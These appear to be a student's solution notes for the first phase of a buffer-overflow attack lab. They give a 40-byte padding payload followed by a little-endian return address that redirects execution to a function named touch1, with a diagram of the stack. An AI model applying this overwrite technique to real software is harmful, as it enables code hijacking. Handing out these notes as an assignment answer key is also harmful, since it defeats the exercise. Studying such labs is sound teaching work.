40 bytes are allocated to the buffer, so payload can be 
40 charachters + address. 

address of touch1 is  0x4017c0
address of touch in little endian is c0 17 40 00 00 00 00 00

possible input:

00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
c0 17 40 00 00 00 00 00

The stack after input:
---------------------------
|00 00 00 00 00 40 17 c0  | return address after calling Gets()
---------------------------
|00 00 00 00 00 00 00 00  | bottom of stack
---------------------------
|00 00 00 00 00 00 00 00  |
---------------------------
|00 00 00 00 00 00 00 00  |
---------------------------
|00 00 00 00 00 00 00 00  |
---------------------------
|00 00 00 00 00 00 00 00  | top of stack
---------------------------

